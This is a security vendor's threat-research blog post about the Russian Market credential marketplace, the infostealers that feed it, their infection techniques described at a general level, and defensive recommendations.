Stolen credentials are the golden ticket for cybercriminals, and infostealer malware is the key that unlocks it all. The scale of the threat is staggering: In 2024, ReliaQuest’s GreyMatter Digital Risk Protection (GreyMatter DRP) service raised over 136,000 customer alerts related to potential stolen credentials on the notorious automated vending cart site Russian Market.

Russian Market has cemented itself as the Amazon of stolen credentials, dominating the cybercriminal ecosystem with its simplicity, convenience, and massive inventory. Despite criticisms of selling duplicate logs and hosting public data disguised as private, its streamlined one-click purchases, and advanced filtering options make it the platform of choice for threat actors.

By 2023, the marketplace boasted over 5 million logs—each containing tens to hundreds of credentials—the marketplace offers attackers an affordable and efficient way to compromise accounts, often for as little as $2. While rivals like Telegram channels and newer marketplaces struggle to compete, Russian Market’s longevity and reliability keep it at the forefront, even amid concerns of law enforcement targeting its operations.

No organization is safe from the Russian Market infostealer threat, although industries like professional services and information tend to be disproportionately impacted due to their high digital engagement and complex supply chains.

To better understand what’s fueling this lucrative underground economy, the ReliaQuest Threat Research team published a report investigating the tactics, tools, and trends driving Russian Market’s success—and why businesses must act now to protect themselves.

Download the Full Report >

In this blog, we’ll look at three themes from the report: cybercriminals’ infostealer choices, how the infostealers represented on Russian Market make their way onto machines in the first place, and the exclusivity of the stolen logs.

Figure 1: Russian Market "LOGS" page

The landscape of credential theft is shaped by the infostealers cybercriminals choose, as these tools determine the scope and effectiveness of their operations. By analyzing over 1.6 million posts on Russian Market since 2022, we uncovered the rise and fall of popular infostealers, driven by factors like technical innovation, law enforcement interventions, and distribution tactics.

“Lumma” (aka LummaC2) emerged as the dominant infostealer, accounting for nearly 92% of Russian Market credential log alerts in Q4 2024. Our analysis shows that cybercriminals favor advanced, commercial infostealer tools, which likely drove Lumma’s success. In addition, its use of fake CAPTCHA pages for distribution likely further propelled its meteoric rise. But, since Lumma's takedown in May 2025, “Acreed” is the likely next big infostealer threat surpassing many other established stealers in Q1 2025.

Figure 2: Percentage of Russian Market alerts attributed to different infostealers by quarter

Real-World Case Study: Rapid Containment of Lumma Malware

In January 2025, ReliaQuest responded to a critical alert indicating the presence of Lumma malware within a customer’s environment. The alert stemmed from a suspicious PowerShell command that downloaded Lumma. Following a thorough investigation, ReliaQuest implemented decisive containment measures, including host isolation, credential rotation, and blocking malicious domains and payloads. While the investigation confirmed Lumma was successfully executed, existing security controls prevented outbound connections to its command-and-control infrastructure, ensuring no data exfiltration occurred.

This incident underscores the importance of proactive monitoring and rapid response in mitigating credential theft risks. ReliaQuest’s GreyMatter DRP and Automated Response Playbooks were instrumental in limiting the impact of this attack, reducing the time to contain the threat from hours to minutes.

How Infostealers Compromise Machines: What the Logs Tell Us

Our analysis of Russian Market logs found that infostealers use a variety of sophisticated techniques to compromise machines and steal credentials.

  1. Abusing Writable Directories: Attackers exploit writable directories, like the Temp folder, to create temporary working spaces for staging malicious operations before stealing or exfiltrating data.

  2. Obfuscation with Scripts and Archives: Techniques such as AutoIt scripts and compressed files are used to disguise malware as legitimate software, bypassing antivirus tools.

  3. Hidden Payloads: Infostealers often conceal payloads in less-monitored directories, such as "C:/Windows/Fonts/," or use legitimate tools like Mavinject32.exe to inject malicious code into processes.

  4. Living-Off-the-Land (LotL) Techniques: Attackers leverage pre-installed system utilities like MSBuild.exe to execute malicious scripts, blending seamlessly with legitimate system processes.

  5. Persistence Mechanisms: Infostealers ensure their longevity by creating registry keys, scheduled tasks, or implanting files in startup directories, allowing them to survive reboots and evade user interventions.

Together, these five methods form a robust toolkit for attackers, emphasizing the importance of proactive defense strategies to mitigate these threats.

ReliaQuest Reviews: How Does Russian Market Measure Up?

Russian Market’s popularity among cybercriminals stems from its vast inventory of stolen credentials, but our analysis of over 300 malware logs containing tens of thousands of stolen passwords revealed a significant portion of its offerings are recycled rather than unique. This recycling often results from cybercriminals uploading the same logs across multiple platforms, including Telegram channels and other forums, or reselling logs purchased from Russian Market elsewhere. While this casts doubt on the platform’s inventory quality, it doesn’t necessarily suggest deliberate deception by Russian Market itself.

Figure 3: Post by cybercriminal forum user SGL claiming Russian Market is full of public logs

Another issue is that some sellers inflate their listings with fake credentials, such as generic email addresses like “example[at]gmail[.]com,” exploiting the high demand for domains like Gmail. Buyers see only the domain name before purchase, uncovering the deception only after the transaction is complete. This practice reflects the immense value of Gmail accounts in the cybercriminal ecosystem, as they often serve as gateways to multiple connected services, including financial platforms, entertainment subscriptions, and online shopping accounts.

Russian Market lacks a system for rating or reviewing sellers, unlike cybercriminal forums where buyers can publicly expose scammers. This absence of accountability weakens trust among buyers over time, but the steady influx of new buyers allows dishonest sellers to continue operating with minimal consequences, confident that the potential rewards outweigh the risks.

Countering the Infostealer Threat

It’s far more effective to address infostealer activity at its root—when infostealers are infiltrating your environment—than waiting for the consequences of credential abuse to play out. By stopping infostealers early, organizations can significantly reduce the downstream risks associated with stolen credentials. To tackle the infostealer threat head-on, consider these defensive steps.

  • Enforce strict network policies or Group Policy Objects (GPOs) to prevent the storage of credentials in web browsers, as infostealers often target browser-stored data for exfiltration.

  • Reduce session durations to limit the risk of session hijacking and force users to reauthenticate more frequently, minimizing the attack window for compromised cookies.

  • Deploy monitoring solutions to detect signs of infostealer-linked credential abuse, such as geographically anomalous logins, repeated login failures, or logins from unfamiliar devices.

ReliaQuest has developed specific detections and GreyMatter Automated Response Playbooks designed to target infostealer activity at multiple stages of the attack lifecycle. The detections focus on identifying suspicious behavior associated with credential theft, while the Automated Response Playbooks enable rapid responses to mitigate risks. By combining the detections with the Playbooks, organizations can reduce their mean time to contain (MTTC) threats from hours to just minutes.